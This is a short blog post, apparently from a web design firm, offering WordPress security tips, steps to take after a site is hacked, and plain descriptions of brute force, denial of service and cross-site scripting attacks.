“Oh no, my website has been hacked!” is being heard more often these days. It doesn’t matter if your site is small or big, all sites are vulnerable. Take some time to put some security measures in place today to protect your website. Sometimes websites are hacked by people, but often they are attacked by “bots” which are computer programs written by hackers. These bots scan sites for vulnerabilities but can often be stopped if you put a few safeguards in place.
If your site runs on WordPress, there are many options for extensibility through hooks, plugins and themes. This can create the risk of massive security problems in the WordPress environment that are not caused by WordPress itself. For instance, forms that allow user input can be used for malicious purposes if the data entered is not processed in a way that makes it safe for the rest of the system. There is no way to achieve total security on your website, but you can prevent most problems before they happen.
TIPS to SECURE WORDPRESS
- Protect the admin account.
- Rename the admin account to something, not “admin” and use a secure password of at least 14 characters, not words. Generate a secure password. Don’t use the same login on different websites. Then, apply new secret keys to the wp-config file. This forces all users to log in again.
- Protect wp-config.php file
- Hide WordPress Version
- Disable theme and plugin editor if not needed
- Change your database prefix before installing WordPress
- Use the robots.txt file to keep it from scanning your wp files
- Scrutinize widgets, plugins, and third-party code.
- Remove unused plugins and themes. Keep WordPress software, all plugins, and themes up to date.
- Don’t approve any comments that you aren’t sure are real. Turn off comments if you don’t need them.
- Backups are very important to your site security. A backup may be your only recovery option. Schedule regular backups of your data and files and not on the main server.
- Pay for security monitoring and/or install security plugins: For example Sucuri offers monitoring and malware removal.
Security plugins can help protect your site.
If your site gets hacked:
- Remember the first rule in any emergency- Don’t Panic!
- Contact your web host for help.
- Make a full backup of the infected site.
- Change all your passwords and authentication keys in the wp-config.php
- Remove any old themes, plugins, and unused code from your server.
- Update all code on your server. You can do a fresh install of WordPress from the Updates page. Reinstall themes or plugins with fresh copies.
- Check that the file permissions on your files are correct, esp. wpconfig.php and uploads
- Check any other sites on your hosting account.
Follow us for another post soon on web security, where we will discuss the importance of migrating your website to HTTPS. Contact us for help with website design and development.
TYPES of SECURITY PROBLEMS
Brute Force Attacks
These types of attacks happen all the time and are a computer program that tries to access your admin dashboard by trying different passwords until the correct one is found. Using the “admin” user id and a weak password makes it easy for this program to succeed. IMPORTANT TIP: Get a strong password of 14 characters or more, not words, that uses a combo of upper and lower cases with numbers. Use a tool like LastPass or http://strongpasswordgenerator.com to get your password. Don’t use the same password in multiple places.
If a hacker can get access to your server, they can change information through the database or just bring your whole site down. Use SFTP to transfer files between your computer and and web server and strong passwords to prevent them getting access.
Denial of Service Attacks
DoS or denial of service attacks work by flooding a web server with requests usually with a computer program until it can no longer handle the load and crashes. Your data is usually safe but your site will not load until you can block the bad traffic. Make sure your web host uses a reliable Firewall and has security protocols in place (most do now).
Cross Site Scripting
An attacker injects a client-side script into a web page. This can alllow them to bypass access controls, steal cookies and hijack active sessions to steal information. An XSS vulnerability, can allow a hacker to upload links with malicious content in comments or other pages on your site. When clicked it will allow the attacker to take data from the visitor. To prevent this form of attack, keep up to date with WordPress security and plugin updates and incorporate security scanning of your site with your web host or a third party.